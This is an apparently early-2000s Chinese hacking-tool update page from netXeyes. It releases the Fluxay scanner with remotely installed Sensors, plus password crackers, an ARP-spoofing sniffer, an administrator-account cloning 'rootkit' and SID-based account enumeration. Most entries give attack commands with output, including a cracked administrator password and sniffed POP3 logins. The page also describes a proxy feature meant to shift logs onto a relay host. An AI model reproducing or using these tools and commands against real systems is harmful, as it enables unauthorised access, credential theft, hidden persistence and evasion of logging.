新建网页 1

【Last Update 2002/11/17】

[无心呢喃精华] 2002/11/17

经过19821119的辛勤努力，无心呢喃精华版的第二部分也已经完成，提供下载。

下载

[无心呢喃精华] 2002/11/12

经过19821119的辛勤努力，无心呢喃精华版的第一部分终于完成，提供下载。

下载

[Fluxay 5 新增功能-Remote ANS] 2002/11/04

在流光5中将会出现一个新的工具Remote ANS（Remote ARP Network Sniffer），这个工具采用了Sensor/GUI的结构，和流光4.5中的Sensor类似。

Remote ANS的最大特点就是可以对远程交换网络进行嗅探，捕获远程局域网络的数据包，这个功能对于网络渗透尤为有用。

[WMICracker 0.1] 2002/08/29 基于WMI的Windows2000/NT 帐号破解

WMI (Windows Management Instrumentation)，不依赖于IPC$（也就是不依赖于Server服务)。多线程帐号破解工具。

C:\>WMICracker.exe

WMICracker 0.1, Protype for Fluxay5. by netXeyes 2002.08.29
http://www.netXeyes.com, Security@vip.sina.com

WMICracker.exe <IP> <Username> <Password File> [Threads]

<IP> Windows 2000/NT, 135 Must be Opened 目标主机135端口必须开放(Remote Procedure Call (RPC))
<Username> Username, Must Belong to Administrators 用户名，必须属于Administrators组
<Password File> Password List File 字典文件
[Threads] Parallel Theads, Default is 80 并发线程数目，默认80。

注意，此工具不适用于对本机的探测，从速度上来说，比IPC$快，但是不如SMBCrack，适用于SMBCrack无法使用的场合（Server服务没有开放等）。

例如：

C:\>WMICracker.exe 10.192.64.29 administrator test.dic

WMICracker 0.1, Protype for Fluxay5. by netXeyes 2002.08.29
http://www.netXeyes.com, Security@vip.sina.com

Waiting For Session Start....
Testing dcom...Access is denied.
Testing administrator...Access is denied.
Testing ...Access is denied.
Testing 123456...Access is denied.

administrator's Password is 8800

http://www.netXeyes.org/WMICracker.exe

[ARPSniffer 0.5] 2002/08/12 基于交换环境的Sniffer工具

1、修正了ARP报文的问题，原来版本的ARP报文存在BUG，会出现丢包或者ARP欺骗不成功的现象。

2、可以指定嗅探的网卡。

3、包含了IPRouter的功能，不依靠于系统，也不用修改注册表。

感谢SHIXUDONG的测试和建议。

需要安装WINPCAP 2.1驱动。

C:\>arpsniffer

ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security@vip.sina.com

Network Adapter 0: FE575C-3COM 10/100 LAN CardBus-Fast Ethernet
Network Adapter 1: Xircom CreditCard Ethernet+Modem 33.6

Usage: ArpSniffer <IP1> <IP2> <Sniffer TCP Port> <LogFile> <NetAdp> [/RESET]

例如:

FE575C-3COM 10/100 LAN CardBus-Fast Ethernet 网卡网络设置如下

IP 192.168.0.29

Gateway: 192.168.0.1

掩码:255.255.255.0

需要嗅探192.168.0.16的POP3邮件

ARPSniffer 192.168.0.1 192.168.0.16 110 log.txt 0

110:POP3的端口，如果端口制定为＊，则说明捕获所有的TCP报文。

log.txt:将捕获到的数据记录到文件log.txt

0: 指定捕获的网卡，本例中为FE575C-3COM 10/100 LAN CardBus-Fast Ethernet

当捕获结束后，192.168.0.16会在一段时间内无法上网（因为它的ARP表还没有改过来），这个时候可以发一个／RESET来恢复，这样192.168.0.16就可以正常上网了。

ARPSniffer 192.168.0.1 192.168.0.16 110 log.txt 0 ／RESET

http://www.netXeyes.org/ARPSniffer.rar

[SMBCrack] 2002/07/27

SMBCrack是为流光5开发的测试原型，和以往的SMB（共享）暴力破解工具不同，没有采用系统的API，而是使用了SMB的协议。

Windows 2000可以在同一个会话内进行多次密码试探。

这个版本在扫描windows 2000的密码时，速度大约是流光的4－5倍。windows NT 4没有测试过，速度可能会慢一点。

C:\My Documents\SMBGrind\Release>SMBCrack

SMBCrack <IP> <Username> <Password file>

C:\My Documents\SMBGrind\Release>
　

<IP>: 远程计算机的IP

<Username>: 用户名，例如Administrator

<Password file>: 字典文件

例如：SMBCrack 192.168.0.1 administrator c:\password.dic

http://www.netxeyes.org/SMBCrack.exe

[VNC的远程安装] 2002/07/01

VNC的远程安装

[ARPSNIFFER 0.2] 2002/06/10

修正了在某些系统上运行时会出错或者系统崩溃的情况。

请安装Winpcap 2.1，详细情况参见Readme.txt.

下载

[ARPSNIFFER] 2002/05/28

C:\>arpsniffer

ARPSniffer, by netXeyes, Special Thanks BB
www.netXeyes.com 2002, dansnow@21cn.com

Usage: ArpSniffer [IP1] [IP2] [Sniffer TCP Port] [LogFile]

IP1、IP2：在交换环境中需要Sniffer的两个IP。
Sniffer TCP Port：需要Sniffer的协议，例如110、21、23等。如果需要捕获所有的数据包用*即可。
LogFile：将Sniffer到的内容存入文件。

在非交换环境中，所有的数据包都会被捕获。

例如192.168.0的局域网，网关为192.168.0.1，如果想捕获192.168.0.16的POP3数据，可以这样：

C:\>arpsniffer 192.168.0.1 192.168.0.16 110 log.txt
ARPSniffer, by netXeyes, Special Thanks BB
www.netXeyes.com 2002, dansnow@21cn.com

Spoof 192.168.0.16: Mac of 192.168.0.1 ===> Mac of 192.168.0.29
Spoof 192.168.0.1: Mac of 192.168.0.16 ===> Mac of 192.168.0.29

Begin Sniffer.........

211.101.171.203(110)->192.168.0.16(2110)
+OK Hello there.
211.101.171.203(110)->192.168.0.16(2110)
+OK Hello there.
192.168.0.16(2110)->211.101.171.203(110)
USER webmaster
192.168.0.16(2110)->211.101.171.203(110)
USER webmaster
211.101.171.203(110)->192.168.0.16(2110)
+OK Password required.
211.101.171.203(110)->192.168.0.16(2110)
+OK Password required.
192.168.0.16(2110)->211.101.171.203(110)
PASS iopjkl
192.168.0.16(2110)->211.101.171.203(110)
PASS iopjkl
211.101.171.203(110)->192.168.0.16(2110)
+OK logged in.
211.101.171.203(110)->192.168.0.16(2110)
+OK logged in.
192.168.0.16(2110)->211.101.171.203(110)
STAT
192.168.0.16(2110)->211.101.171.203(110)
STAT
211.101.171.203(110)->192.168.0.16(2110)
+OK 0 0
211.101.171.203(110)->192.168.0.16(2110)
+OK 0 0
211.101.171.203(110)->192.168.0.16(2110)
+OK Bye-bye.
211.101.171.203(110)->192.168.0.16(2110)
+OK Bye-bye.
202.108.255.203(110)->192.168.0.16(2111)
+OK CoreMail Version 2.0 Copyright (c) 2000 Tebie Limited
202.108.255.203(110)->192.168.0.16(2111)
+OK CoreMail Version 2.0 Copyright (c) 2000 Tebie Limited
202.108.255.203(110)->192.168.0.16(2111)
+OK core mail
202.108.255.203(110)->192.168.0.16(2111)
+OK core mail
202.108.255.203(110)->192.168.0.16(2111)
+OK 0 message(s) [0 byte(s)]
202.108.255.203(110)->192.168.0.16(2111)
+OK 0 message(s) [0 byte(s)]
202.108.255.203(110)->192.168.0.16(2111)
+OK 0 0
202.108.255.203(110)->192.168.0.16(2111)
+OK 0 0
202.108.255.203(110)->192.168.0.16(2111)
+OK core mail
202.108.255.203(110)->192.168.0.16(2111)
+OK core mail

下载需要安装WINPCAP

另外需要开启IP Routing的功能

修改注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

增加一项

Name:IPEnableRouter

Type:REG_DWORD

Value:0x01

重启系统即可。
[如何在交换环境下SNIFFER] 2002/05/21

Windows 交换环境下ARP Sniffer的实现

[如何在交换环境下SNIFFER] 2002/05/19

如何在交换环境下SNIFFER

[Check Clone Account] 2002/04/29

检查由CA克隆的帐号.

C:\>cca \\211.161.45.203 guest ""

Check Clone Account, by netXeyes 2002/04/29
Written by netXeyes 2002, dansnow@21cn.com

Connect 211.161.45.203 ....OK
Prepairing ....OK
Processing ....OK
Checking ....

Check Result:

[Guest] AS SAME AS [Administrator]

Clean Up ....OK

http://www.netXeyes.org/CCA.exe

[Clone Administrator] 2002/04/28

今天在NSFOCUS上面看到关于克隆系统帐号的文章，于是写了这个小工具CA(Clone Administrator)。

利用这个工具可以将Administrator的帐号克隆为一个指定的普通帐号（此普通帐号必须已经存在）。克隆得到的帐号具有和系统内置的Administrator同样的设置，并且用NET命令或者用户管理器也发现不了其权限已经被提升，是一个不错的ROOT KIT.

用一个例子说明用法：

1、假定我们通过扫描器获得了192.168.0.1上用户test的密码为test（属于administrators组）.

2、利用GetAccount（http://www.netXeyes.org/GetAccount.exe)获得系统中已经存在的帐号信息（当然利用空连接也可以）。

C:\>getaccount \\192.168.0.1 1

GetAccount Via SID, by netXeyes 2002/04/06

Connect Host 192.168.0.1 ....OK

Start Ememurate Account....

Name is: TsInternetUser
Name is: NetShowServices
Name is: NetShow Administrators
Name is: IUSR_VICTIM
Name is: IWAM_VICTIM
Name is: zjf
Name is: DHCP Users
Name is: DHCP Administrators

Disconnect Host 192.168.0.1 ....OK

3、利用CA.exe 将Iusr_victim克隆为Administrator。

C:\>ca \\192.168.0.1 test test iusr_victim password
Clone Administrator, by netXeyes 2002/04/06
Written by netXeyes 2002, dansnow@21cn.com

Connect 192.168.0.1 ....OK
Get SID of iusr_victim ....OK
Prepairing ....OK
Processing ....OK
Clean Up ....OK

C:\>

这时，iusr_victim就成为了超级用户，并有具有和Administrator同样的设置(桌面、菜单等等）。

在192.168.0.1上面用Net命令查看的结果：

User name IUSR_VICTIM
Full Name Internet Guest Account
Comment Built-in account for anonymous access to Internet I
nformation Services
User's comment Built-in account for anonymous access to Internet I
nformation Services
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2002/4/28 下午 10:31
Password expires Never
Password changeable 2002/4/28 下午 10:31
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2002/4/28 下午 09:02

Logon hours allowed All

Local Group Memberships *Guests
Global Group memberships *None

下载: http://www.netXeyes.org/CA.exe

[利用SID枚举系统帐号] 2002/04/06

在枚举NT系统用户帐号时，通常通过NULL Session，来进行。但是并不是说只要建立了NULL Session就可以枚举帐号，如果作了一些安全设置就没那么容易了。（例如：在用流光枚举的时候出现的ErrorCode: 5就是这样的）

但是我们可以通过SID来进行这个工作，我们知道，系统中每建立一个用户账号，总会给其赋一个标识号，就好比Unix系统中，每个用户账号都有一个UID一样，在Windows NT/2000系统里，用户的唯一标识号就是SID（安全标识号）。之后，该用户对系统资源进行访问时，就是通过其SID进行权限检查的。

一个SID是由一长串数字组成的，其中包括两个部分，前一部分用来唯一标识一个域（如果是独立的工作站，唯一标识的就是工作站主机），后一部分唯一标识域（或主机）中的某个账号。
例如：
S-1-5-21-789336058-113007714-1060284298-500
对域在同一个域中SID的前面部分时相同的，不同的只是最后的部分。
系统内置的管理员账号SID的最后总是500、Guest的SID最后总是501。
用户帐号SID的最后是从1000开始的。

知道了这个规律，我们就可以通过得到Guest的SID，通过构造SID的最后部分（累加）来枚举用户帐号。一个帐号即使被删除，他的SID依然存在。所以通过这种方法得到的用户名有一些也许是已经被删除了的。

我写了一个小工具GetAccount，就是根据这个原理来的。

用法：
GetAccount \\IP Type Count

Type:
0：系统内置的帐号
1：用户增加的帐号

Count: 枚举的数目（累加的数目）

例如：
C:\>GetAccount.exe \\211.154.211.15 1 10

GetAccount Via SID, by netXeyes 2002/04/06

Connect Host 211.154.211.15 ....OK

Start Ememurate Account....

Name is: TsInternetUser
Name is: IUSR_XINNET-5C4H2165
Name is: IWAM_XINNET-5C4H2165
Name is: iisshare
Name is: www.sbs.com.cn Admins
Name is: www.sbs.com.cn Authors
Name is: www.sbs.com.cn Browsers
Name is: web2018
Name is: www.fontainburg.com Admins
Name is: www.fontainburg.com Authors

Disconnect Host 211.154.211.15 ....OK

下载: http://www.netXeyes.org/GetAccount.exe

[流光4.7］ For Windows NT /2000/XP Released 2002/04/04

经过4次内部测试，流光4.7终于可以提供下载了。

1、加入了本地模式，在本机运行是不必安装Sensor。

2、Sensor扫描临时结果文件(*.PTR)的尺寸大约减少了10倍。

3、后台扫描模式时，扫描的结果（*.PTR)可以直接通过附件发送到信箱。

4、Sensor的扫描速度加快。

5、减少了Sensor异常退出的BUG。

6、流光的界面和Sensor之间的通讯采用Triple-DES，密钥的长度最多可到192bits，保证整个传输过程不可监听。扫描的结果也只有在密钥正确的情况下才可阅读。

7、修正的控制服务，新的控制服务在升级Sensor时不再会失败。

8、Sensor的服务名称可以任意指定，控制服务和Sensor的进程名称也可以任意指定。

9、支持XP（本地模式），很快会有98/ME的版本。

流光4.7，可以控制以前版本的Sensor，但是，低版本的流光不能控制流光4.7的Sensor（Build 091或更高版本）。

[流光4.6］ For Windows NT / Windows 2000 Released 2002/03/03

开始提供下载，支持NT/2000。可以将Sensor安装在NT4.0/Windows 2000中，通过客户端进行管理、扫描。

经过近一个月的调试和部分网友的内部测试，这是一个比较稳定的版本，当然还会有很多BUG。

1、修正了HTTP探测时出现非法操作的问题。

2、增加了Sensor管理工具，可以对大量的Sensor进行方便地管理。

3、卸载Sensor时，将所有文件全部删除。

4、Sensor不再保存任何扫描后的PWD文件，也不保存任何设置文件。Sensor的扫描报告文件可以通过［Fluxay Sensor 扫描历史记录］删除。

5、Sensor可以在后台运行，扫描完成后采用SMS或者E-mail两种方式通知用户，SMS或者E-mail等敏感信息在Sensor主机均为没有任何外部形式的保存。

6、修正了Sensor在NT 4.0下无法启动的问题，但是必须重新安装控制服务（方法见说明文件）。

7、更新的说明文件，请务必尽早阅读。

IMPORTANT

使用流光4.6，Sensor必须进行升级（Build 066）或者更高的版本。升级的方法：[工具］->［Fluxay Sensor 工具］->[更新 Fluxay Sensor]。流光4.5将不能控制Build 066以上版本的Sensor。

默认安装路径为流光4.5的安装路径，这样做的目的在于读取流光4.5安装的Sensor。如果安装在其他目录下，请将流光4.5安装目录下的AdvHost.HIS文件复制到4.6的安装目录下。

在使用4.6的高级扫描功能以前，请在安装Sensor或者对以往安装的Sensor进行升级。

Sensor可以安装在本机（仅仅支持NT 4.0/Windows 2000）时，本机必须开放了Admin$共享。

在流光4.6调试期间，得到了BB、小五、傲气雄鹰、FetDog、SharkStorm等朋友的大力支持，在此一并致谢！

[流光4.6］ 2002/03/01

更新的使用说明

[流光4.6］ 2002/02/18

自从流光4.5发布以来，收到了大量的反馈意见，利用春节期间针对大家的意见作了调整和改动。

1、可以离线运行，Sensor会自动在远程主机进行扫描，无需用户监控。

2、当扫描完成后，Sensor可以通过手机短消息通知用户。

3、增加了Sensor管理工具，可以方便地对大量的Sensor主机进行分类管理。

使用Detect功能可以获得各个Sensor的运行状态、版本等信息。

绿色主机：表明Sensor运行正常。

黄色主机：表明控制服务或者扫描服务至少又一个出现了问题。

红色主机：Sensor已不可用。

4、还将加入的功能

扫描完成后，扫描报告可以发送至指定的信箱。

删除服务时，将连同文件一起删除。

[流光4.5］开始提供测试 2002/02/05

让大家久等了，流光4.5采用了一种全新的扫描器结构，据我所知应该是在NT平台上面实现的第一个功能比较全面，结构类似于Nessus的扫描工具。

这个版本的流光只能运行于NT/2000/XP环境中，高级扫描功能的Sensor只能安装在NT/2000平台。

在仔细考虑之后，此版本的高级扫描功能仍然对国内IP保留（IP地址已经做了更新）。

Sensor目前还存在很多BUG，应该是所有发布的版本中BUG最多的一个。

建议在使用基于Sensor的扫描工作以前，保存所有未存的数据，以免发生意外。

由于Sensor不能运行在LocalSystem模式下，所以在启动Sensor的时候会自动建立一个用户Iusr_Sensor，在启动完成后会自动删除。

使用前，请务必仔细阅读［4.5新增功能］。

感谢各位的支持，新年快乐！

[论坛合并］

由于netXeyes.org的空间速度极慢，导致原先的三个技术论坛访问困难。先将三个论坛搬至netXeyes.com,，由于空间所限（100M），所以将此三个论坛合并，有关技术的问题，请发至此论坛。

[Fluxay 4.5］Sensor 使用说明

和以往一样先发布说明 :-)

流光4.5新增功能说明

[Fluxay 4.5］Sensor工作流程

一、安装（完成）

1、和远程主机建立连接。

2、在远程主机%System Root%System32下建立目录，目录的名字为服务的名字。

3、将本地FluxaySensor下的所有文件复制到上述目录。

4、远程启动Sensor控制进程，该进程在指定端口监听。

二、Sensor启动（完成）

1、启动控制服务。

2、为了使Sensor运行在用户模式下，首先会创建一个用户Iusr_Sensor。

3、以Iusr_Sensor用户的身份启动Sensor进程。

4、删除Iusr_Sensor用户。

5、每隔30秒检测一次Sensor服务的状态，如果出现异常则重复步骤2－5。

三、升级Sensor （完成）

1、连接控制服务。

2、通知控制服务停止Sensor的运行。

3、通过控制服务复制新版本的Sensor程序。

4、通知控制服务启动Sensor。

四、手工停止Sensor进程（完成）

1、连接控制服务。

2、输入密码。

3、在控制提示符下输入“_STOP SENSOR”，由此服务启动的所有Sensor进程均被停止。

五、手工启动Sensor进程（完成）

1、连接控制服务。

2、输入密码。

3、在控制提示符下输入“_START SENSOR”。

六、卸载（未完成）

1、和远程主机建立连接。

2、停止控制服务和相关的Sensor进程。

3、卸载控制服务。

[Fluxay 4.5 ]开发进度

Sensor Console Password: ************** ===============Banyet Soft Labs. 1995-2002 All Rights Reserved.=============== ===========Written by Assassin, Fluxay Sensor Console Build 0464============== Microsoft Windows 2000 [Version 5.00.2195] Sensor Console>_tcpproxy 66 192.168.0.105 23 Proxy to 192.168.0.105 Port 23 is Listen on Local Port: 66 Sensor Console>_list proxy THREADID ListenPort TargetIP TargetPort 1756 66 192.168.0.105 23 480 23 202.101.224.23 23 1712 80 12.8.9.190 80 Sensor Console>_kill proxy 1712 Error Kill Thread 1712, or Thread Already Terminated. Sensor Console>_kill proxy 1756 Thread 1756 Has been Terminated. Sensor Console>
流光4.5的控制服务可以提供对Sensor 控制，提供了RemoteNC的全部功能，而且加入了一个TCP的代理功能。例如：可以在远程的Sensor主机(A)上面开启一个端口55，将这个端口转发到另外一台主机(B)的端口23。这时只要连接A的端口55可以直接连接到B的端口23了。这样连接之后，在B上面留下的日志都是A的。通过一系列命令可以对TCP的代理进行控制管理，例如:_list Proxy－列出当前所有的转发端口；_kill Proxy－终止指定的转发进程等等。

[Fluxay IV Build 2915 For 98/ME]

IPC不可用，其余功能和NT版本一致。

请确定已经安装了流光4 Build 2912 For 98/ME，释放到安装的目录覆盖即可。

推荐使用NT/2000/XP版本。

[Fluxay IV Build 2915 For NT/2000/XP]

由于流光4.5目前还没有测试完成，所以发布了这个升级包。

将来在流光4.5发布之后，流光4将依然可用（因为考虑到用户的多样性，流光4.5 Sensor的安装可能对于很多初学者来说困难了点）。

请确定已经安装了流光4 Build 2914，释放到安装的目录覆盖即可。

请到［小榕作品］下载。

[Fluxay4.5 And Fluxay Sensor] Ready for Launch

流光4.5中高级扫描功能借鉴了Nessus的结构，将执行扫描的模块(Fluxay Sensor）安装在远程主机（当然也可以安装在本地）。整个Sensor模块有以下一个模块构成:

1、远程自动安装启动

2、控制服务采用CreateProcessAsUser的方式启动扫描模块，避免了采用LocalSystem方式启动带来的问题（最明显的不足就在于不能进行IPC的扫描，因为LocalSystem没有权限创建NT会话凭证）。

3、控制服务每隔一段时间扫描服务的状态，如果Sensor服务被停止，将自动启动。

4、可以远程升级扫描模块

将Sensor段分离出来的好处是不言自喻的，首先将Sensor安装在带宽较高的主机上面，可以获得比较快的速度，其次，所有扫描的LOG都是Sensor主机的。

Fluxay Sensor可以安装在NT/2000系统中，但是目前在XP下没有安装成功，原因在于IPC$不能登陆，如果哪位知道解决的方法，请告诉我。

目前Fluxay Sensor还有一些小问题，我还在继续修改，具体提供下载的时间大约会在10日左右，请耐心再等几天。

流光4.5修改／新增了以下BUG

1、加入一个大的用户列表时，速度比较慢

2、Finger探测误报

3、增加了对于SunOS FTP 利用CWD猜测用户名的功能

2001年即将过去，感谢各位的支持！新年快乐！

更新的历史